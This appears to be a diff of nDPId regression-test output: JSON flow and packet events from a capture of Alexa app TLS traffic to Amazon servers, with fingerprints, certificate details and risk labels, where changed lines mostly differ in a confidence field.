{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": 
{"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01823{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01823{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 